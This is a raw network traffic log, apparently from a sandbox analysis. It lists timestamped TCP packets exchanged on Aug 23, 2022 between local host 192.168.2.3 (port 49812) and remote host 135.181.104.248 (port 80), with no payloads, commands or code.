Aug 23, 2022 03:43:00.803476095 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803966045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804008961 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804043055 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804080009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804117918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804122925 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804141998 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804147005 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804150105 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804155111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804192066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804208040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804229021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804245949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804250002 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804265976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804280043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804302931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804322958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804338932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804348946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804377079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804382086 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804414988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804449081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804475069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804485083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.804512024 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.804528952 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805039883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805079937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805115938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805140972 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805150986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805159092 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805182934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805187941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805202007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805229902 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805242062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805268049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805305958 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805310011 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805324078 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805341959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805346966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805380106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805388927 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805418015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805434942 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805453062 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805489063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805490971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805495024 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805527925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805541039 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805565119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805572987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805603027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805613041 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805639029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805675983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805692911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805712938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805731058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805751085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805787086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805810928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805824041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805860996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805876017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805897951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805916071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.805933952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805975914 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.805978060 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.806016922 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.806051970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.806087971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.806096077 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.806126118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.806157112 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.806160927 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.806165934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.806176901 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.806199074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.806207895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.806236029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.806260109 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.806293964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.808262110 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.808346987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.808382988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.808397055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.808423042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.808444977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814455986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814491987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814527035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814547062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814559937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814568043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814572096 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814595938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814625978 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814630985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814655066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814666986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814692974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814702034 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814734936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814740896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814749956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814769983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814804077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814830065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814836979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814861059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814872026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814886093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814908981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814933062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.814945936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.814980030 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815002918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815015078 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815037966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815048933 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815064907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815082073 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815098047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815116882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815145016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815150023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815169096 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815184116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815203905 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815220118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815248013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815252066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815285921 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815294027 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815301895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815331936 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815363884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815426111 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815433979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815468073 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815501928 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815516949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815546036 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815552950 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815586090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815587997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815608978 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815623045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815658092 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815677881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815694094 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815706015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815728903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815763950 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815804958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815808058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815814018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815841913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815876961 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815900087 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815912008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815926075 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.815944910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.815979004 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816003084 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816011906 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816029072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816049099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816071987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816083908 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816102028 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816118002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816135883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816154003 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816179037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816225052 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816260099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816262007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816297054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816307068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816330910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816332102 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816365957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816390038 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816401958 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816436052 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816443920 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816453934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816468954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816484928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816504955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816519976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816540956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816579103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816610098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816613913 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816636086 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816646099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816683054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.816709042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.816735983 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817271948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817306042 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817341089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817351103 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817368984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817373991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817394972 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817409992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817421913 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817445040 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817467928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817477942 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817491055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817514896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817548037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817568064 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817584038 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817608118 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817617893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817636013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817663908 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817697048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817713976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817732096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817740917 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817766905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817800999 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817819118 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817833900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817847013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817868948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817884922 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817904949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817939997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817953110 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.817974091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.817981958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818008900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818044901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818054914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818078041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818087101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818123102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818159103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818172932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818192959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818203926 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818228960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818238020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818264961 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818270922 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818339109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818358898 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818375111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818378925 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818409920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818416119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818444014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818459034 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818478107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818490982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818515062 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818548918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818568945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818584919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818597078 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818619967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818630934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818655968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818691015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818711042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818723917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818734884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818758011 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818763018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818790913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818804979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818825960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818837881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818871975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818876982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818907022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818939924 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818953037 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.818974972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.818984032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819009066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819024086 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819042921 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819077015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819092989 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819116116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819123030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819150925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819195032 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819196939 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819221973 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819231033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819262981 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819264889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819276094 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819299936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819334984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819338083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819422007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819427013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819457054 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819466114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819499016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819500923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819519997 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819550037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819559097 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819586992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819605112 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819619894 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819642067 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819653988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819674969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819688082 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819721937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.819730997 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.819756031 CEST	80	49812	135.181.104.248	192.168.2.3
